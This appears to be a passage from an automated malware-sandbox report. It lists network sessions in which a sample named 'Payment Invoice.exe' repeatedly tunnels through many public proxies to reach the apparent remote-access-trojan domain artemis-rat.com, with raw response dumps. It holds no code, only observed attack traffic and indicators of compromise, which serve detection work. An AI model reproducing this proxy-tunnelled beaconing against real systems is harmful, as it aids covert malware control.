                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.964114904 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                979192.168.2.452850128.140.26.12807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.665224075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.975461006 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.25.2
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                980192.168.2.452927201.71.2.419997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.672638893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.885999918 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                981192.168.2.452857185.38.111.180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.673188925 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:18.994539022 CET75INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:19.374325991 CET103INHTTP/1.1 400 Bad Request
                                                                Content-Type: text/plain; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                Data Ascii: 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                982192.168.2.452205197.155.237.7481117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.679904938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.174746990 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                983192.168.2.452957104.17.62.87807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.680883884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.835629940 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                984192.168.2.452961104.18.254.76807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.681303978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.835566998 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                985192.168.2.452895196.20.125.14580837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.681505919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                986192.168.2.452974104.20.205.191807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.706048965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.861486912 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                987192.168.2.45296350.63.12.33507817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.787338018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                988192.168.2.451143132.148.128.88266067076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.787427902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.823996067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                989192.168.2.45292151.15.139.15163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.787518024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.479994059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.386451006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248794079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.777020931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264703989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.792586088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.728743076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.589225054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                990192.168.2.45283661.7.149.480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.791062117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.527024984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.079499006 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                991192.168.2.452918195.114.209.50807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.792728901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.526926041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511759996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527301073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.323913097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.121154070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.011508942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.693721056 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:38 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 618
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform the
                                                                Mar 11, 2024 16:15:38.693736076 CET274INData Raw: 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73
                                                                Data Ascii: m of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Por


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                992192.168.2.45289737.235.48.19807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.792732954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                993192.168.2.45250061.178.152.3173027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.792752981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.163083076 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                994192.168.2.45279545.117.179.179556067076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.794250965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714405060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.120908022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824368954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.214804888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.620976925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.026853085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.823668957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:12.323694944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                995192.168.2.452867200.32.51.17980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.797458887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.589293957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.917766094 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                996192.168.2.4529705.161.103.113807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.800141096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                997192.168.2.452899180.104.0.16110807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.800921917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                998192.168.2.452979104.20.225.218807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:18.801254988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.961580038 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
